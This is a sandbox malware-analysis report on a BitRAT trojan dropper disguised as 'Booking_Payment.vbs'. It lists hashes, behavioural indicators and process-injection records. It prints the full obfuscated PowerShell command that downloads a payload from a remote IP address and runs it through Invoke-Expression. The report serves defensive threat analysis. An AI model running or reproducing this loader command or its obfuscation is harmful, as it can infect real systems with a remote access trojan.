bitrat | 2853fdee44775a8aec2874b28c52d10537ce6f383ce53f3a610f45c9c82fa212

General

Target

Booking_Payment.vbs
Size

4KB
MD5

18ac5f0f564e29f3ab4f8a48fdea9ecc
SHA1

47216392c30357a1de277c89703765ac8305f603
SHA256

2853fdee44775a8aec2874b28c52d10537ce6f383ce53f3a610f45c9c82fa212
SHA512

e5d71ba533a21554f142e471648e9032568872893275756684a9967b4bae4cd352ae70793b0358e1894808cf515a2f9b46431a05fbc4a50d88adaa3caab595a7

Score

10^/10

bitrat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://13.230.14.133/bypass.txt

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3592-163-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral2/memory/3592-164-0x000000000068A488-mapping.dmp	family_bitrat
behavioral2/memory/3592-166-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

8 3720 powershell.exe
23 3720 powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

aspnet_regsql.exe

pid process

3592 aspnet_regsql.exe
3592 aspnet_regsql.exe
3592 aspnet_regsql.exe
3592 aspnet_regsql.exe
3592 aspnet_regsql.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3720 set thread context of 3592 3720 powershell.exe aspnet_regsql.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exe

pid process

3720 powershell.exe
3720 powershell.exe
3720 powershell.exe
3720 powershell.exe
3720 powershell.exe
3720 powershell.exe
3720 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeaspnet_regsql.exe

description pid process

Token: SeDebugPrivilege 3720 powershell.exe
Token: SeShutdownPrivilege 3592 aspnet_regsql.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

aspnet_regsql.exe

pid process

3592 aspnet_regsql.exe
3592 aspnet_regsql.exe

flow	pid	process
8	3720	powershell.exe
23	3720	powershell.exe

pid	process
3592	aspnet_regsql.exe
3592	aspnet_regsql.exe
3592	aspnet_regsql.exe
3592	aspnet_regsql.exe
3592	aspnet_regsql.exe

description	pid	process	target process
PID 3720 set thread context of 3592	3720	powershell.exe	aspnet_regsql.exe

pid	process
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeShutdownPrivilege	3592	aspnet_regsql.exe

pid	process
3592	aspnet_regsql.exe
3592	aspnet_regsql.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2636 wrote to memory of 3720	2636	WScript.exe	powershell.exe
PID 2636 wrote to memory of 3720	2636	WScript.exe	powershell.exe
PID 3720 wrote to memory of 3556	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3556	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3556	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 2148	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 2148	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 2148	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe
PID 3720 wrote to memory of 3592	3720	powershell.exe	aspnet_regsql.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Booking_Payment.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H = 'http://13.230.14.133/bypass.txt';$eeeeeeeeeeeeee = '+`Close`8Close31Close+0Close3dClose+0Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close`1Close+7Close+cClose+7Close6eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close`+Close+7Close+cClose+7Close`5Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close`3Close+7Close+cClose+7Close7`Close+7Close+9Close3bClose+`Close`8Close3+Close+0Close3dClose+0Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close``Close``Close``Close``Close``Close``Close``Close``Close+7Close+cClose+7Close+eClose+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close`5Close+7Close+cClose+7Close57Close+7Close+9Close3bClose+`Close`8Close3`Close+0Close3dClose+0Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close`eClose5`Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose`eClose5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close5`Close+7Close+cClose+7Close`9Close`5Close+7Close+9Close3bClose+`Close`8Close33Close+0Close3dClose+0Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose`cClose+7Close+cClose+7Close6+Close`3Close+7Close+9Close3bClose+`Close`8Close`8Close+0Close3dClose+0Close+`Close`8Close31Close+bClose+`Close`8Close3+Close+bClose+`Close`8Close33Close+bClose+`Close`8Close3`Close3bClose+`Close`8Close`8Close`8Close+0Close3dClose+0Close+7Close``Close`fClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose6eClose`7Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close57Close6eClose`cClose6fClose61Close``Close53Close5`Close7+Close`9Close+7Close+9Close3bClose+`Close`8Close`8Close`8Close`8Close+0Close3dClose+7Close`9Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose`5Close63Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose`8Close+9Close+eClose+`Close`8Close`8Close`8Close+8Close+`Close`8Close+9Close+7Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close60Close+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+dClose+7Close+cClose+7Close`5Close58Close+8Close6eClose65Close60Close57Close60Close+dClose`fClose6+Close6aClose60Close+7Close+9Close+eClose5+Close65Close70Close6cClose61Close63Close65Close+8Close+7Close+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+bClose+7Close+cClose+7Close60Close5`Close+0Close+`Close`8Close+7Close+9Close3bClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close+8Close+`Close`8Close`8Close`8Close`8Close+0Close+dClose`aClose6fClose69Close6eClose+0Close+7Close+7Close+9Close7cClose+6Close+8Close+7Close`9Close+7Close+bClose+7Close`5Close58Close+7Close+9Close'.Replace('`','4').Replace('+','2');$yyyyyyyyyyyyyyyyy = $eeeeeeeeeeeeee -split 'Close' |ForEach-Object {[char][convert]::ToUInt32($_,16) };$RDTFYGUIHJODRGFHTGYJH = $yyyyyyyyyyyyyyyyy -join '';$AA = 'In++++++++++++++ess'.Replace('++++++++++++++','voke-Expr') ; $BB= 'ion $R==================H'.Replace('==================','DTFYGUI');$CC='J-----------------JH'.Replace('-----------------','ODRGFHTGY');I`E`X ($AA , $BB , $CC -Join '')|I`E`X;
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:3556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:2148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3592

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3592-163-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/3592-166-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/3592-164-0x000000000068A488-mapping.dmp

Download
memory/3720-123-0x0000022BCCE30000-0x0000022BCCE31000-memory.dmp

Filesize
4KB

Download
memory/3720-127-0x0000022BCCC20000-0x0000022BCCC22000-memory.dmp

Filesize
8KB

Download
memory/3720-120-0x0000022BCCB70000-0x0000022BCCB71000-memory.dmp

Filesize
4KB

Download
memory/3720-121-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-122-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-115-0x0000000000000000-mapping.dmp

Download
memory/3720-124-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-119-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-129-0x0000022BCCC23000-0x0000022BCCC25000-memory.dmp

Filesize
8KB

Download
memory/3720-130-0x0000022BCCC26000-0x0000022BCCC28000-memory.dmp

Filesize
8KB

Download
memory/3720-147-0x0000022BCCC28000-0x0000022BCCC29000-memory.dmp

Filesize
4KB

Download
memory/3720-158-0x0000022BB4580000-0x0000022BB4584000-memory.dmp

Filesize
16KB

Download
memory/3720-118-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-116-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-165-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download
memory/3720-117-0x0000022BB2C80000-0x0000022BB2C82000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing